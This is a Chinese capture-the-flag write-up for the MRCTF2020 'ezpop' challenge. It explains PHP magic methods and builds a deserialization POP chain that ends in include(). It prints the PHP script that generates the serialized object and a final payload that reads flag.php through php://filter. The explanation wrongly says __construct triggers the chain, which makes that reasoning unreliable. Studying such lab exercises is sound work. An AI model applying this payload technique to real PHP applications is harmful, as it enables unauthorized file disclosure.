当前位置：首页 > news >正文

[MRCTF2020]ezpop wp

news 来源：原创 2025/9/6 13:29:55

本题考点:php反序列化的pop链

首先来了解一下pop链是什么,它类似于多米诺骨牌一环套一环,要调用这个成员方法然后去找能调用这个方法的魔术方法,最后一环接一环,完成一个链子,最终形成payload。

那么来了解一下这些魔术方法

__construct()            //类的构造函数，创建对象时触发(new 对象())
__destruct()             //类的析构函数，对象被销毁时触发(调用完后就会触发)(反序列化调用对象时也会触发)
__call()                 //在对象上下文中调用不可访问的方法时触发
__callStatic()           //在静态上下文中调用不可访问的方法时触发
__get()                  //读取不可访问属性的值时，这里的不可访问包含私有属性或未定义
__set()                  //在给不可访问属性赋值时触发
__isset()                //当对不可访问属性调用 isset() 或 empty() 时触发
__unset()                //在不可访问的属性上使用unset()时触发
__invoke()               //当尝试以调用函数的方式调用一个对象时触发(当对象以class名()输出时会触发)
__sleep()                //执行serialize()时，先会调用这个方法
__wakeup()               //执行unserialize()时，先会调用这个方法
__toString()             //当反序列化后的对象被输出在模板中的时候（转换成字符串的时候）自动调用(用echo输出对象的时候会触发)(php中echo 只能输出字符串,而print_r()可以输出对象,数组等)

好那么看题


Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier {protected  $var;public function append($value){include($value);}public function __invoke(){$this->append($this->var);}}class Show{public $source;public $str;public function __construct($file='index.php'){$this->source = $file;echo 'Welcome to '.$this->source."<br>";}public function __toString(){return $this->str->source;}public function __wakeup(){if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {echo "hacker";$this->source = "index.php";}}}class Test{public $p;public function __construct(){$this->p = array();}public function __get($key){$function = $this->p;return $function();}}if(isset($_GET['pop'])){@unserialize($_GET['pop']);}else{$a=new Show;highlight_file(__FILE__);}

首先看有危害的地方,如:eval,assert,system,include等危险函数,本题有危害的地方是

public function append($value){

include($value);

}

这里定义了一个参数可以包含文件,而本题开头也有提示,flag在flag.php里面。

那么接下来找哪里调用了这个方法

public function __invoke(){

$this->append($this->var);

}

可以看到invoke()这个魔术方法调用了append方法,那么如何触发(当对象被当作函数触发时)也就是类名加上(),

找下一环怎么才能让对象被当作函数触发

class Test{

public $p;

public function __construct(){

$this->p = array();

}

public function __get($key){

$function = $this->p;

return $function();

}

这里最后如果把p传入一个append的对象Modifier,那么最后会返回Modifier(), __construct()(这个方法创建对象或者实例化对象就触发不用理它),那么着重看__get(),这个要调用一个不存在的成员变量来触发,那么下一步就是去找如何才能调用不存在的成员变量

public function __toString(){

return $this->str->source;

}

这里的意思是如果触发__toString(),那么返回str里的source属性,先不用管它为什么同为属性,str就能调用source,这里把它当成了一个对象,那么如果给str赋一个没有source的对象,这不就有不存在的成员变量了嘛,那么可以给str赋值为Test来触发__get方法。这个__toString()的触发方式是把对象当成字符串:

__toString() //当反序列化后的对象被输出在模板中的时候（转换成字符串的时候）自动调用(用echo输出对象的时候会触发)(php中echo 只能输出字符串,而print_r()可以输出对象,数组等)

来找一个有echo且能赋值的地方

public function __construct($file='index.php'){

$this->source = $file;

echo 'Welcome to '.$this->source."<br>";

}

这里就能赋值的同时用echo输出,那么给source赋值一个对象就行了,其他两个类都用了,这次就只能用它本身的类Show了,这里是__construct()方法就不用想办法让它触发了,那么一个pop链就完成了,这里我用的是倒推法

__construct-> __toString()->__get()->__invoke()-> append($value)(触发文件包含)

那么就把这些序列化吧,

<?phpclass Modifier {protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";}class Show{public $source;public $str;}class Test{public $p;public function __get($key){$function = $this->p;return $function();}}$a = new Modifier();$b = new Show();$c = new Test();$b->str=$c;$b->source=$b;$c->p=$a;echo serialize($b);?>

这里用php://filter的原因是,只用flag.php是读取不到的。

对了,protected方法有特殊字符占位所以要在变量前输入%00*%00,简单点的方法就是在echo后面加一个urlencode()

最后输出$b也就是show对象的原因是它底下的两个变量都成了另外两个类了,直接输它省事。

Payload:O:4:"Show":2:{s:6:"source";r:1;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"%00*%00var";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}}

最后得出flag

相关文章：